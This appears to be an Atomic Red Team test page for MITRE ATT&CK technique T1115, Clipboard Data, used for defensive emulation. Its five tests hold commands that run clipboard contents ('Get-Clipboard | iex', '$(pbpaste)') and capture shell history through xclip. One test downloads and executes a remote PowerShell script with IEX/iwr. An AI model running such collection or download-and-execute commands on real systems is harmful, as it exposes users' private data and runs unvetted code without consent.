# T1115 - Clipboard Data
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1115)
<blockquote>

Adversaries may collect data stored in the clipboard from users copying information within or between applications. 

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)

macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)

- [Atomic Test #2 - Execute Commands from Clipboard using PowerShell](#atomic-test-2---execute-commands-from-clipboard-using-powershell)

- [Atomic Test #3 - Execute commands from clipboard](#atomic-test-3---execute-commands-from-clipboard)

- [Atomic Test #4 - Collect Clipboard Data via VBA](#atomic-test-4---collect-clipboard-data-via-vba)

- [Atomic Test #5 - Add or copy content to clipboard with xClip](#atomic-test-5---add-or-copy-content-to-clipboard-with-xclip)


<br/>

## Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.

**Supported Platforms:** Windows


**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7






#### Attack Commands: Run with `command_prompt`! 


```cmd
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```

#### Cleanup Commands:
```cmd
del %temp%\T1115.txt >nul 2>&1
```





<br/>
<br/>

## Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Utilize PowerShell to echo a command to clipboard and execute it

**Supported Platforms:** Windows


**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416






#### Attack Commands: Run with `powershell`! 


```powershell
echo Get-Process | clip
Get-Clipboard | iex
```






<br/>
<br/>

## Atomic Test #3 - Execute commands from clipboard
Echo a command to clipboard and execute it

**Supported Platforms:** macOS


**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff






#### Attack Commands: Run with `bash`! 


```bash
echo ifconfig | pbcopy
$(pbpaste)
```






<br/>
<br/>

## Atomic Test #4 - Collect Clipboard Data via VBA
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt

**Supported Platforms:** Windows


**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | string | Word|


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
```

#### Cleanup Commands:
```powershell
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```




<br/>
<br/>

## Atomic Test #5 - Add or copy content to clipboard with xClip
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.

**Supported Platforms:** Linux


**auto_generated_guid:** ee363e53-b083-4230-aff3-f8d955f2d5bb






#### Attack Commands: Run with `sh`! 


```sh
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
```






<br/>